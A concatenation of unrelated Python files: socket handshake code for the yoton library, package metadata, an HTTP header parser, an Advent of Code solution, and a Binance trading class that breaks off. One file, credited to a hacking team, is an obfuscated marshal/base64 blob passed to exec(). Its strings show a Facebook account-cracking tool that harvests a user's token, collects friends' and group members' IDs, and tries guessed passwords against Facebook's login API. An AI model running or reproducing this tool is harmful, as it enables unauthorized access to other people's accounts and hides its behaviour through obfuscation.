s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, SOCKET_BUFFERS_SIZE)
s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, SOCKET_BUFFERS_SIZE)
# Apply SO_REUSEADDR when binding, so that an improperly closed
# socket on the same port will not prevent us from connecting.
# It also allows a connection to bind at the same port number,
# but only after the previous binding connection has connected
# (and has closed the listen-socket).
#
# SO_REUSEADDR means something different on win32 than it does
# for Linux sockets. To get the intended behavior on Windows,
# we don't have to do anything. Also see:
# * http://msdn.microsoft.com/en-us/library/ms740621%28VS.85%29.aspx
# * http://twistedmatrix.com/trac/ticket/1151
# * http://www.tcpipguide.com/free/t_TCPPortsConnectionsandConnectionIdentification-2.htm
if not sys.platform.startswith('win'):
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# Try all ports in the specified range
for port2 in range(port, port+max_tries):
try:
s.bind((hostname,port2))
break
except Exception:
# Raise the socket exception if we were asked to try
# just one port. Otherwise just try the next
if max_tries == 1:
raise
continue
else:
# We tried all ports without success
tmp = str(max_tries)
tmp = "Could not bind to any of the " + tmp + " ports tried."
raise IOError(tmp)
# Tell the socket it is a host, backlog of zero
s.listen(0)
# Set connected (status 1: waiting for connection)
# Will be called with status 2 by the hostThread on success
self._set_status(STATUS_WAITING, s)
# Start thread to wait for a connection
# (keep reference so the thread-object stays alive)
self._hostThread = HostThread(self, s)
self._hostThread.start()
def connect(self, address, timeout=1.0):
""" Connect to a bound socket.
"""
hostname, port = self._get_hostname_and_port(address)
# Create socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Set buffer size to be fairly small (less than 10 packages)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, SOCKET_BUFFERS_SIZE)
s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, SOCKET_BUFFERS_SIZE)
# Refuse rediculously low timeouts
if timeout<= 0.01:
timeout = 0.01
# Try to connect
ok = False
timestamp = time.time() + timeout
while not ok and time.time() < timestamp:
try:
s.connect((hostname, port))
ok = True
except socket.error:
pass
except socket.timeout:
pass
time.sleep(timeout / 100.0)
# Did it work?
if not ok:
type, value, tb = sys.exc_info()
del tb
err = str(value)
raise IOError("Cannot connect to %s on %i: %s" % (hostname, port, err))
# Shake hands
h = HandShaker(s)
success, info = h.shake_hands_as_client()
# Problem?
if not success:
self._set_status(0)
if not info:
info = 'problem during handshake'
raise IOError('Could not connect: '+ info)
# Store id
self._id2, self._pid2 = info
# Set connected (status 3: connected as client)
self._set_status(STATUS_CONNECTED, s)
class HostThread(threading.Thread):
""" HostThread(context_connection, bds_socket)
The host thread is used by the ContextConnection when hosting a
connection. This thread waits for another context to connect
to it, and then performs the handshaking procedure.
When a successful connection is made, the context_connection's
_connected() method is called and this thread then exits.
"""
def __init__(self, context_connection, bsd_socket):
threading.Thread.__init__(self)
# Store connection and socket
self._context_connection = context_connection
self._bsd_host_socket = bsd_socket
# Make deamon (Python can exit even if this thread is still alive)
self.setDaemon(True)
def run(self):
""" Run the main loop. Waits for a connection and performs handshaking
if successfull.
"""
# Try making a connection until success or the context is stopped
while self._context_connection.is_waiting:
# Wait for connection
s = self._wait_for_connection()
if not s:
continue
# Check if not closed in the mean time
if not self._context_connection.is_waiting:
break
# Do handshaking
hs = HandShaker(s)
success, info = hs.shake_hands_as_host()
if success:
self._context_connection._id2 = info[0]
self._context_connection._pid2 = info[1]
else:
print('Yoton: Handshake failed: '+info)
continue
# Success!
# Close hosting socket, thereby enabling rebinding at the same port
self._bsd_host_socket.close()
# Update the status of the connection
self._context_connection._set_status(STATUS_HOSTING, s)
# Break out of the loop
break
# Remove ref
del self._context_connection
del self._bsd_host_socket
def _wait_for_connection(self):
""" The thread will wait here until someone connects. When a
connections is made, the new socket is returned.
"""
# Set timeout so that we can check _stop_me from time to time
self._bsd_host_socket.settimeout(0.25)
# Wait
while self._context_connection.is_waiting:
try:
s, addr = self._bsd_host_socket.accept()
return s # Return the new socket
except socket.timeout:
pass
except socket.error:
# Skip errors caused by interruptions.
type, value, tb = sys.exc_info()
del tb
if value.errno != EINTR:
raise
class HandShaker:
""" HandShaker(bsd_socket)
Class that performs the handshaking procedure for Tcp connections.
Essentially, the connecting side starts by sending 'YOTON!'
followed by its id as a hex string. The hosting side responds
with the same message (but with a different id).
This process is very similar to a client/server pattern (both
messages are also terminated with '\r\n'). This is done such that
if for example a web client tries to connect, a sensible error
message can be returned. Or when a ContextConnection tries to connect
to a web server, it will be able to determine the error gracefully.
"""
def __init__(self, bsd_socket):
# Store bsd socket
self._bsd_socket = bsd_socket
def shake_hands_as_host(self):
""" _shake_hands_as_host(id)
As the host, we wait for the client to ask stuff, so when
for example a http client connects, we can stop the connection.
Returns (success, info), where info is the id of the context at
the other end, or the error message in case success is False.
"""
# Make our message with id and pid
message = 'ZOOF says yoton!'
# Get request
request = self._recv_during_handshaking()
if not request:
return False, STOP_HANDSHAKE_TIMEOUT
elif request.strip() == message:
self._send_during_handshaking(message)
return True, (0, 0)
else:
# Client is not yoton
self._send_during_handshaking('ERROR: this is Zoof via yoton.')
return False, STOP_HANDSHAKE_FAILED
def shake_hands_as_client(self):
""" _shake_hands_as_client(id)
As the client, we ask the host whether it is a Yoton context
and whether the channels we want to support are all right.
Returns (success, info), where info is the id of the context at
the other end, or the error message in case success is False.
"""
# Make our message with id and pif
# todo: define message as constant
message = 'ZOOF says yoton!'
# Do request
error = self._send_during_handshaking(message)
# Get response
response = self._recv_during_handshaking()
# Process
if not response:
return False, STOP_HANDSHAKE_TIMEOUT
elif response.strip() == message:
return True, (0, 0)
else:
return False, STOP_HANDSHAKE_FAILED
def _send_during_handshaking(self, text, shutdown=False):
bb = (text + '\r\n').encode('utf-8')
try:
n = self._bsd_socket.sendall(bb)
except socket.error:
return -1 # Socket closed down badly
if shutdown:
try:
self._bsd_socket.shutdown(socket.SHUT_WR)
except socket.error:
pass
def _recv_during_handshaking(self, timeout=2):
# Init parts (start with one byte, such that len(parts) is always >= 2
parts = [' '.encode('ascii'),]
end_bytes = '\r\n'.encode('ascii')
maxtime = time.time() + timeout
# Receive data
while True:
# Get part
try:
part = self._bsd_socket.recv(1)
parts.append(part)
except socket.error:
return None # Socket closed down badly
# Detect end by shutdown (EOF)
if not part:
break
# Detect end by \r\n
if (parts[-2] + parts[-1]).endswith(end_bytes):
break
# Combine parts (discared first (dummy) part)
bb = bytes().join(parts[1:])
return bb.decode('utf-8', 'ignore')
|
# <p>
__title__ = 'pnbp'
__description__ = 'pretty notebook parser'
__url__ = 'https://github.com/prettynb/pnbp'
__version__ = '0.8.6'
__build__ = 0x111000
__author__ = 'Ellenurb Sitruc'
__author_email__ = 'ellenurbsitruc@gmail.com'
__license__ = 'MIT License'
__copyright__ = 'Copyright (c) 2021 prettynb'
# <script>
__cake__ = None #\\ nb <- https://github.com/psf/requests/blob/master/requests/__version__.py
# </script>
# </p>
|
######################################
# Thank You Allah Swt.. #
# Thanks My Team : Hacker Cyber Team Tegal #
# Thnks You All My Friends me. #
# Thanks All Member BCC : #
# Leader : Hamdhan channel97 #
# CO Founder : Mr.Hamdan #
# CO Leader : Tegal #
# CO : hamdan sobirin #
# Zumbailee,Febry, Bima, Accil, Alfa #
# Ardi Bordir Raka, Wahyu Andika. #
# Mr.OO3T, Yulia Febriana, Sadboy, #
# Cyto Xploit, Sazxt, Minewizard, #
# Riki, Omest #
######################################
import marshal, base64
exec(marshal.loads(base64.b16decode("630000000000000000040000004000000073170200006400006401006C00005A00006400006401006C01005A01006400006401006C02005A02006400006401006C03005A03006400006401006C04005A04006400006401006C05005A05006400006401006C06005A06006400006401006C07005A07006400006401006C08005A08006400006401006C09005A09006400006401006C0A005A0A006400006401006C0B005A0B006400006401006C0C005A0C006400006402006C0D006D0E005A0E00016400006403006C0F006D10005A1000016400006404006C0C006D11005A110001651200650100830100016501006A130064050083010001650C006A11008300005A14006514006A1500651600830100016514006A1700650C006A18006A1900830000640600640700830101016418006701006514005F1A00640A008400005A1B00640B008400005A1C00640C008400005A1D006500006A1E00640D0083010001640E008400005A1F00640F005A20006700005A21006700005A22006700005A23006700005A24006700005A25006700005A26006700005A27006700005A28006700005A29006700005A2A006700005A2B006700005A2C006700005A2D006700005A2E006700005A2F006700005A30006700005A31006410005A32006411005A33006412008400005A34006413008400005A35006414008400005A36006415008400005A37006538006416008401005A3900653A006417006B0200721302653400830000016E000064010053281900000069FFFFFFFF4E2801000000740A000000546872656164506F6F6C2801000000740F000000436F6E6E656374696F6E4572726F722801000000740700000042726F7773657274040000007574663874080000006D61785F74696D656901000000730A000000557365722D4167656E7473520000004F706572612F392E38302028416E64726F69643B204F70657261204D696E692F33322E302E323235342F38352E20553B206964292050726573746F2F322E31322E3432332056657273696F6E2F31322E31366300000000000000000100000043000000731600000064010047487400006A01006A0200830000016400005328020000004E73160000000A1B5B33393B316D205468616E6B20596F75202A5F2A280300000074020000006F7374030000007379737404000000657869742800000000280000000028000000007302000000646774060000006B656C7561720E0000007304000000000105016300000000000000000200000043000000733200000064010047487400006A0100640200830100016403004748640400474864010047487400006A02006A0300830000016400005328050000004E7401000000207405000000636C656172734A0000000A1B5B313B33396D5B1B5B33313B316D211B5B33393B316D5D201B5B33313B316D4B6F6E656B7369205465727075747573201B5B313B33396D5B1B5B33313B316D211B5B33393B316D5D73650000001B5B313B33396D5B1B5B33323B316D2B1B5B33393B316D5D1B5B33323B316D53696C61686B616E20506572696B7361204B656D62616C69204B6F6E656B736920496E7465726E657420416E64611B5B313B33396D5B1B5B33323B316D2B1B5B33393B316D5D28040000005205000000740600000073797374656D520600000052070000002800000000280000000028000000007302000000646774030000006F747712000000730C000000000105010D0105010501050163010000000200000003000000430000007343000000783C007C000064010017445D30007D01007400006A01006A02007C0100830100017400006A01006A0300830000017404006A050064020083010001710B00576400005328030000004E73010000000A677B14AE47E17A843F2806000000520600000074060000007374646F7574740500000077726974657405000000666C757368740400000074696D657405000000736C656570280200000074010000007A740100000065280000000028000000007302000000646774050000006A616C616E1A00000073080000000001110110010D01730C0000007368206E61726765742E73686300000000020000000600000043000000734F0000006401006402006403006404006405006406006706007D00007830007C0000445D28007D01006407007C010017477400006A01006A0200830000017403006A040064080083010001711F00576400005328090000004E73040000002E20202073040000002E2E202073040000002E2E2E2073050000002E2E2E2E2073050000002E2E2E2E2E73060000002E2E2E2E2E2E73330000000D1B5B33393B316D5B1B5B33323B316D2B1B5B33393B316D5D1B5B33323B316D536564616E67204C6F67696E1B5B33393B316D690100000028050000005206000000520D000000520F0000005210000000521100000028020000007405000000746974696B74010000006F2800000000280000000073020000006467740300000074696B23000000730A000000000218010D0108010D016900000000730D0000001B5B33316D4E6F742056756C6E73090000001B5B33326D56756C6E63000000000B000000060000004300000073170300007400006A010064010083010001791A007402006402006403008302007D000074030083000001576EE902047404007405006602006B0A007212030101017400006A0100640100830100017400006A0100640400830100017400006A01006405008301000164060047487406006407008301007D0100640800474864060047487406006409008301007D020064080047486406004748740700830000017911007408006A0200640A0083010001576E2D00047409006A0A006B0A0072DC00010101640B004748740B006A0C00640C0083010001740D00830000016E010058740E007408006A0F005F10007408006A1100640D00640E00830001017C01007408006A1200640F003C7C02007408006A12006410003C7408006A1300830000017408006A14008300007D03006411007C03006B0600729602793D016412007C010017641300177C020017641400177D0400690B0064150064160036641700641800367C0100640F0036641900641A0036641B00641C0036641B00641D0036641E00641F0036642000642100367C02006417003664220064230036642400642500367D05007415006A16006426008301007D06007C06006A17007C0400830100017C06006A18008300007D07007C05006A17006901007C070064270036830100016428007D03007419006A1A007C03006429007C05008301017D0800741B006A1C007C08006A1D008301007D0900740200640200642A008302007D0A007C0A006A1E007C0900642B0019830100017C0A006A1F0083000001640B004748642C004748642D00474864080047487419006A2000642E007C0900642B00191783010001740B006A0C00642F00830100017403008300000157719602047419006A21006A22006B0A00729202010101740D0083000001719602586E00006430007C03006B060072DA02640B0047486431004748643200474864310047487400006A010064330083010001740B006A0C00640C008301000174230083000001711303640B004748642C004748643400474864080047487400006A010064330083010001740B006A0C0064350083010001742400830000016E0100586400005328360000004E520A00000073090000006C6F67696E2E747874740100000072730C0000007368206E61726765742E736873070000007368206F2E736873370000000000001B5B33343B316DE29594E29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E2959773480000001B5B313B33396D5B1B5B33323B316D2B1B5B33393B316D5D1B5B313B33356D476D61696C1B5B33313B316D2F1B5B33353B316D4E6F6D6F721B5B313B39316D3A1B5B313B33396D2073370000000000001B5B33343B316DE2959AE29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E2959D733A0000001B5B313B33396D5B1B5B33323B316D2B1B5B33393B316D5D1B5B313B33356D50617373776F72642046421B5B313B39316D3A1B5B313B33396D20731600000068747470733A2F2F6D2E66616365626F6F6B2E636F6D73380000000A0000001B5B33343B316DE2959AE29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E2959D690100000074020000006E7269000000007405000000656D61696C740400000070617373730B000000736176652D64657669636573470000006170695F6B65793D383832613834393033363164613938373032626639376130323164646331346463726564656E7469616C735F747970653D70617373776F7264656D61696C3D7360000000666F726D61743D4A534F4E67656E65726174655F6D616368696E655F69643D3167656E65726174655F73657373696F6E5F636F6F6B6965733D316C6F63616C653D656E5F55536D6574686F643D617574682E6C6F67696E70617373776F72643D733B00000072657475726E5F73736C5F7265736F75726365733D30763D312E3036326638636539663734623132663834633132336363323334333761346133327420000000383832613834393033363164613938373032626639376130323164646331346474070000006170695F6B6579740800000070617373776F7264741000000063726564656E7469616C735F7479706574040000004A534F4E7406000000666F726D6174740100000031741300000067656E65726174655F6D616368696E655F6964741800000067656E65726174655F73657373696F6E5F636F6F6B6965737405000000656E5F555374060000006C6F63616C65730A000000617574682E6C6F67696E74060000006D6574686F64740100000030741400000072657475726E5F73736C5F7265736F75726365737303000000312E3074010000007674030000006D64357403000000736967732700000068747470733A2F2F6170692E66616365626F6F6B2E636F6D2F726573747365727665722E7068707406000000706172616D73740100000077740C0000006163636573735F746F6B656E73380000000A0000001B5B33343B316DE29594E29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E29597732E0000001B5B313B33396D5B1B5B313B33326DE29C931B5B313B33396D5D201B5B313B39326D4C6F67696E20537563657373734D00000068747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F6D652F667269656E64733F6D6574686F643D706F737426756964733D6777696D75736133266163636573735F746F6B656E3D6902000000740A000000636865636B706F696E74520900000073470000000A1B5B33393B316D5B1B5B33313B316D211B5B33393B316D5D1B5B33333B316D536570657274696E796120416B756E20466220416E6461204B656E6120436865636B706F696E747310000000726D202D7266206C6F67696E2E747874732C0000001B5B33393B316D5B1B5B33313B316D211B5B33393B316D5D1B5B33333B316D4C6F67696E20476167616C2121690300000028250000005205000000520B00000074040000006F70656E7405000000737570657274080000004B65794572726F727407000000494F4572726F7274090000007261775F696E70757452170000007402000000627274090000006D656368616E697A65740800000055524C4572726F7252100000005211000000520C00000074040000005472756574080000005F666163746F7279740700000069735F68746D6C740B00000073656C6563745F666F726D7404000000666F726D74060000007375626D6974740600000067657475726C7407000000686173686C696274030000006E65777406000000757064617465740900000068657864696765737474080000007265717565737473740300000067657474040000006A736F6E74050000006C6F616473740400000074657874520E0000007405000000636C6F73657404000000706F7374740A000000657863657074696F6E735201000000520800000074050000006C6F67696E280B0000007405000000746F6B6574740200000069647403000000707764740300000075726C522C0000007404000000646174617401000000787401000000615218000000521200000074040000007A6564642800000000280000000073020000006467524C00000042000000738400000000010D0103010F010B0113010D010D010D0105010C01050105010C0105010501070103011101100105010D010B010C0110010D010D010A010C010C010301160153010F010D010C0114010601150112010F0111010A01050105010501050115020D010B0113010E020C0105010501050105010D010D010A0205010501050105010D010D01630000000000000000050000004300000073920000007400006A0100640100830100017919007402006402006403008302006A0300830000610400576E3700047405006B0A00725F0001010164040047487400006A0100640500830100017406006A070064060083010001740800830000016E0100587400006A0100640100830100017400006A0100640700830100017400006A010064080083010001740900830000016400005328090000004E520A00000073090000006C6F67696E2E747874521800000073200000001B5B313B39316D5B215D20546F6B656E20746964616B20646974656D756B616E7310000000726D202D7266206C6F67696E2E7478746901000000730C0000007368206E61726765742E73687307000000736820782E7368280A0000005205000000520B0000005231000000740400000072656164524D000000523400000052100000005211000000524C000000740B00000070696C69685F73757065722800000000280000000028000000007302000000646752320000008B000000731800000000020D01030119010D0105010D010D010B020D010D010D0163000000000C000000050000004300000073A7020000640100474864010047487400006402008301007D00007C00006403006B02007231006404004748740100830000016EAE017C00006405006B020072AF007402006A0300640600830100017402006A030064070083010001740400640800830100017405006A0600640900740700178301007D01007408006A09007C01006A0A008301007D02007856017C0200640A0019445D17007D0300740B006A0C007C0300640B001983010001719100576E30017C0000640C006B020072A8017402006A0300640600830100017402006A030064070083010001640D00640E00144748740000640F008301007D0400793E007405006A06006410007C04001764110017740700178301007D01007408006A09007C01006A0A008301007D05006412007C050064130019174748576E270004740D006B0A00725101010101641400474874000064150083010001740E00830000016E0100587405006A06006416007C04001764170017740700178301007D06007408006A09007C06006A0A008301007D0300785D007C0300640A0019445D17007D0700740B006A0C007C0700640B001983010001718A01576E37007C00006418006B020072CB017402006A030064190083010001740F00830000016E1400641A007C000017641B00174748740100830000017402006A0300640600830100017402006A0300641C0083010001641D00741000741100740B00830100830100174748740400641E0083010001641F006420006421006703007D08007830007C0800445D28007D09006422007C090017477412006A13006A1400830000017415006A160064230083010001712E0257487402006A0300642400830100016425008400007D0A007417006426008301007D0B007C0B006A18007C0A00740B0083020001642700474874000064280083010001740E00830000016400005328290000004E520900000073380000001B5B33393B316D5B1B5B33323B316D2B1B5B33393B316D5D1B5B33323B316D50696C696E204E6F201B5B33313B316D3A1B5B33393B316D20740000000073180000001B5B313B39316D5B215D204A616E67616E206B6F736F6E6774020000003031520A000000730C0000007368206E61726765742E7368733D0000001B5B313B33396D5B1B5B33323B316D2B1B5B33393B316D5D201B5B313B39326D4D656E67616D62696C2069642074656D616E201B5B313B39376D2E2E2E733300000068747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F6D652F667269656E64733F6163636573735F746F6B656E3D5251000000524E000000740C0000003230303030303030303030306928000000730A0000001B5B313B39376DE29590732C0000001B5B313B39316D5B2B5D201B5B313B39326D494420477275702020201B5B313B39316D3A1B5B313B39376D20732500000068747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F67726F75702F3F69643D730E000000266163636573735F746F6B656E3D733C0000001B5B313B39316D5B1B5B313B39366DE29C931B5B313B39316D5D201B5B313B39326D4E616D612067727570201B5B313B39316D3A1B5B313B39376D2074040000006E616D65731F0000001B5B313B39316D5B215D204772757020746964616B20646974656D756B616E73210000000A1B5B313B39316D5B201B5B313B39376D4B656D62616C69201B5B313B39316D5D731B00000068747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F73350000002F6D656D626572733F6669656C64733D6E616D652C6964266C696D69743D393939393939393939266163636573735F746F6B656E3D740200000030307310000000726D202D7266206C6F67696E2E74787473200000001B5B313B33396D5B1B5B33313B316D211B5B33393B316D5D201B5B313B39376D7318000000201B5B313B39316D50696C69682059616E672042656E61727307000000736820762E7368733A0000001B5B33393B316D5B1B5B33323B316D2B1B5B33393B316D5D201B5B313B39326D4A756D6C6168204944201B5B313B39316D3A201B5B313B39356D73320000001B5B313B33396D5B1B5B33323B316D2B1B5B33393B316D5D201B5B313B39326D4C6F6164696E67201B5B313B39376D2E2E2E73040000002E20202073040000002E2E202073040000002E2E2E2073410000000D0D1B5B313B33396D5B1B5B33323B316D2B1B5B33393B316D5D201B5B313B39326D4D756C6169204D656E67616B736573204B656D616E616E201B5B313B39376D69010000007307000000736820622E736863010000000C000000030000005300000073CB0200007C00007D010079B7027400006A01006401007C01001764020017740200178301007D02007403006A04007C02006A05008301007D03007C030064030019640400177D04007406006A07006405007C010017640600177C040017640700178301007D05007403006A08007C05008301007D06006408007C06006B06007296006409007C010017640A00177C040017640B001747486E2602640C007C0600640D00196B060072B600640E007C010017640B001747486E06027C030064030019640F00177D07007406006A07006405007C010017640600177C070017640700178301007D05007403006A08007C05008301007D06006408007C06006B06007216016409007C010017640A00177C070017640B001747486EA601640C007C0600640D00196B0600723601640E007C010017640B001747486E86017C030064100019640400177D08007406006A07006405007C010017640600177C080017640700178301007D05007403006A08007C05008301007D06006408007C06006B06007296016409007C010017640A00177C080017640B001747486E2601640C007C0600640D00196B060072B601640E007C010017640B001747486E06017C0300641100197D09007C09006A09006412006413008302007D0A007406006A07006405007C010017640600177C0A0017640700178301007D05007403006A08007C05008301007D06006408007C06006B06007224026409007C010017640A00177C0A0017640B001747486E9800640C007C0600640D00196B0600724402640E007C010017640B001747486E78007C0300641400197D0B007406006A07006405007C010017640600177C0B0017640700178301007D05007403006A08007C05008301007D06006408007C06006B060072A0026409007C010017640A00177C0B0017640B001747486E1C00640C007C0600640D00196B060072BC02640E007C01001747486E0000576E07000101016E0100586400005328150000004E731B00000068747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F730F0000002F3F6163636573735F746F6B656E3D740A00000066697273745F6E616D657403000000313233739100000068747470733A2F2F622D6170692E66616365626F6F6B2E636F6D2F6D6574686F642F617574682E6C6F67696E3F6163636573735F746F6B656E3D32333737353939303935393136353525323532353743306631343061616265646662363561633237613733396564316132323633623126666F726D61743D6A736F6E2673646B5F76657273696F6E3D3226656D61696C3D7317000000266C6F63616C653D656E5F55532670617373776F72643D73480000002673646B3D696F732667656E65726174655F73657373696F6E5F636F6F6B6965733D31267369673D3366353535663939666236316663643761613063343466353866353232656636522F00000073310000001B5B313B33396D5B20201B5B33323B316D537563657373201B5B33393B316D5D201B5B33313B316D5B201B5B33363B316D7313000000201B5B33313B316D5D205B1B5B33393B316D207309000000201B5B33313B316D5D73100000007777772E66616365626F6F6B2E636F6D74090000006572726F725F6D736773310000001B5B313B33396D5B1B5B33313B316D4368656B706F696E741B5B33393B316D5D201B5B33313B316D5B201B5B33363B316D7405000000313233343574090000006C6173745F6E616D657408000000626972746864617974010000002F52570000007406000000536179616E67280A00000052440000005245000000524D000000524600000052470000005248000000740600000075726C6C6962740700000075726C6F70656E74040000006C6F616474070000007265706C616365280C00000074030000006172677404000000757365725253000000740100000062740500000070617373315251000000740100000071740500000070617373327405000000706173733374050000006C616869727405000000706173733474050000007061737335280000000028000000007302000000646774040000006D61696ED600000073540000000001060103011B0112010E011F010F010C011802100110020E011F010F010C011802100110020E011F010F010C011802100110020A0112011F010F010C011802100110020A011F010F010C011802100110030301691E00000073400000000A1B5B313B33396D5B1B5B33323B316D2B1B5B33393B316D5D201B5B313B39326D4861636B2046622054656D616E205375636573731B5B33393B316D202A5F2A735F0000000A1B5B33393B316D5B1B5B33323B316D2B1B5B33393B316D5D1B5B33323B316D4B656D62616C69204C616769201B5B33313B316D5B1B5B33343B316D591B5B33313B316D2F1B5B33343B316D541B5B33313B316D5D203A201B5B33393B316D2819000000523500000052560000005205000000520B000000521400000052440000005245000000524D000000524600000052470000005248000000524E0000007406000000617070656E64523300000052320000005208000000740300000073747274030000006C656E5206000000520D000000520F00000052100000005211000000520000000074030000006D6170280C00000074040000007065616B521800000052120000007401000000737403000000696467740300000061737774020000007265740100000069521500000052160000005272000000740100000070280000000028000000007302000000646752560000009C000000736A0000000001050105010C010C0105010A020C010D010D020A0113011201110118030C010D010D0109010C0103011B01120111010D0105010A010B021B011201110118030C010D010A020D0107010D010D0115010A010F010D0108010D01110201010D0209370C01100105010A01630100000004000000020000004300000073330000006401007C0000167D01007400006A01007C01008301007D02007402006A03007C02006A04008301007D03007C0300640200195328030000004E732D00000068747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F6D653F6163636573735F746F6B656E3D2573524E0000002805000000524400000052450000005246000000524700000052480000002804000000524D0000005250000000740300000072657374030000007569642800000000280000000073020000006467740A0000006765745F75736572696414010000730800000000010A010F011201630200000007000000060000004300000073090100007400007C00008301007D02006401007C01007401007C0200830100660200167D0300690200640200640300366404007C000016640500367D04006406007D05007402006A03007C05006407007C03006408007C04008301027D06007C06006A040047486409007C06006A04006B060072AE007405006A0600640A00830100017405006A0600640B0083010001640C00640D00144748640E004748740700640F0083010001740800830000016E57006410007C06006A04006B060072F9007405006A0600640A00830100017405006A0600640B0083010001640C00640D001447486411004748740700640F0083010001740800830000016E0C006412004748740900830000016400005328130000004E738A0100007661726961626C65733D7B2230223A7B2269735F736869656C646564223A2025732C2273657373696F6E5F6964223A2239623738313931632D383466642D346162362D623061612D313962333966303461366263222C226163746F725F6964223A222573222C22636C69656E745F6D75746174696F6E5F6964223A2262303331366464362D336664362D346265622D616564342D626232396335646336346230227D7D266D6574686F643D706F737426646F635F69643D313437373034333239323336373138332671756572795F6E616D653D4973536869656C6465645365744D75746174696F6E2673747269705F64656661756C74733D747275652673747269705F6E756C6C733D74727565266C6F63616C653D656E5F555326636C69656E745F636F756E7472795F636F64653D55532666625F6170695F7265715F667269656E646C795F6E616D653D4973536869656C6465645365744D75746174696F6E2666625F6170695F63616C6C65725F636C6173733D4973536869656C6465645365744D75746174696F6E73210000006170706C69636174696F6E2F782D7777772D666F726D2D75726C656E636F646564730C000000436F6E74656E742D5479706573080000004F41757468202573740D000000417574686F72697A6174696F6E732200000068747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F6772617068716C525100000074070000006865616465727373120000002269735F736869656C646564223A74727565520A000000730C0000007368206E61726765742E73686928000000730A0000001B5B313B39376DE29590732C0000001B5B313B39316D5B1B5B313B39366DE29C931B5B313B39316D5D201B5B313B39326D4469616B7469666B616E73210000000A1B5B313B39316D5B201B5B313B39376D4B656D62616C69201B5B313B39316D5D73130000002269735F736869656C646564223A66616C7365732F0000001B5B313B39316D5B1B5B313B39366DE29C931B5B313B39316D5D201B5B313B39316D44696E6F6E616B7469666B616E73100000001B5B313B39316D5B215D204572726F72280A000000528000000052740000005244000000524A00000052480000005205000000520B000000523500000074040000006C61696E52080000002807000000524D0000007406000000656E61626C65524E000000525100000052820000005250000000527E0000002800000000280000000073020000006467740300000067617A1B010000732C00000000010C011601180106011B0108010F010D010D01090105010A010A020F010D010D01090105010A010A02050174080000005F5F6D61696E5F5F2802000000730A000000557365722D4167656E7473520000004F706572612F392E38302028416E64726F69643B204F70657261204D696E692F33322E302E323235342F38352E20553B206964292050726573746F2F322E31322E3432332056657273696F6E2F31322E3136283B00000052050000005206000000521000000074080000006461746574696D65740600000072616E646F6D5240000000527B0000007409000000746872656164696E67524600000074070000006765747061737352640000005244000000523700000074140000006D756C746970726F63657373696E672E706F6F6C5200000000741300000072657175657374732E657863657074696F6E7352010000005202000000740600000072656C6F6164741200000073657464656661756C74656E636F64696E67523600000074110000007365745F68616E646C655F726F626F7473740500000046616C736574120000007365745F68616E646C655F7265667265736874050000005F687474707414000000485454505265667265736850726F636573736F72740A000000616464686561646572735208000000520C0000005214000000520B000000521700000074040000006261636B7407000000746872656164737408000000626572686173696C740800000063656B706F696E747405000000676167616C7407000000696474656D616E740B000000696466726F6D74656D616E740500000069646D656D524E0000007402000000656D740B000000656D66726F6D74656D616E74020000006870740B000000687066726F6D74656D616E74060000007265616B7369740A0000007265616B73696772757074050000006B6F6D656E74090000006B6F6D656E6772757074080000006C69737467727570740600000076756C6E6F74740400000076756C6E524C0000005232000000525600000052800000005239000000528500000074080000005F5F6E616D655F5F2800000000280000000028000000007302000000646774080000003C6D6F64756C653E0200000073520000009C011002100110010A010D010C010D011C010C020904090809070D0209090601060106010601060106010601060106010601060106010601060106010601060106010601060309490911097809070C1B0C01"))) |
def get_headers(http_resp):
spisok = http_resp.split("\n")
del spisok[0]
del spisok[spisok.index("") :]
slovar = {}
for chast in spisok:
head = chast.split(": ")
slovar[head[0]] = head[1]
return slovar
|
import sys, collections
def solution(L):
P = collections.defaultdict(int)
for (x, y), (x2, y2) in L:
P[x, y] += 1
dx, dy = (x2 > x) - (x2 < x), (y2 > y) - (y2 < y) # cmp
while x != x2 or y != y2:
x += dx; y += dy
P[x, y] += 1
return sum(p > 1 for p in P.values())
print(solution(((int(n) for n in p.split(',')) for p in s.split('->')) for s in sys.stdin.readlines()))
|
import json
import requests
import time
from merkato.exchanges.exchange_base import ExchangeBase
from merkato.constants import MARKET
from binance.client import Client
from binance.enums import *
from math import floor
import logging
from decimal import *
from requests.adapters import HTTPAdapter
s = requests.Session()
s.mount('http', HTTPAdapter(max_retries=3))
s.mount('https', HTTPAdapter(max_retries=3))
log = logging.getLogger(__name__)
getcontext().prec = 8
XMR_AMOUNT_PRECISION = 3
XMR_PRICE_PRECISION = 6
class BinanceExchange(ExchangeBase):
url = "https://api.binance.com"
#todo coin
def __init__(self, config, coin, base, password='password'):
self.client = Client(config['public_api_key'], config['private_api_key'])
self.limit_only = config['limit_only']
self.retries = 5
self.coin = coin
self.base = base
self.ticker = coin + base
self.name = 'bina'
def _sell(self, amount, ask):
''' Places a sell for a number of an asset at the indicated price (0.00000503 for example)
:param amount: string
:param ask: float
:param ticker: string
'''
print('amount', amount, 'ask', ask)
amt_str = "{:0.0{}f}".format(amount, XMR_AMOUNT_PRECISION)
ask_str = "{:0.0{}f}".format(ask, XMR_PRICE_PRECISION)
log.info("Bina placing sell ask: {} amount: {}".format(ask_str, amt_str))
order = self.client.create_order(
symbol=self.ticker,
side=SIDE_SELL,
type=ORDER_TYPE_LIMIT,
timeInForce=TIME_IN_FORCE_GTC,
quantity=amt_str,
price=ask_str,
recvWindow=10000000)
return order
def sell(self, amount, ask):
attempt = 0
while attempt < self.retries:
if self.limit_only:
# Get current highest bid on the orderbook
# If ask price is lower than the highest bid, return.
if Decimal(float(self.get_highest_bid())) > ask:
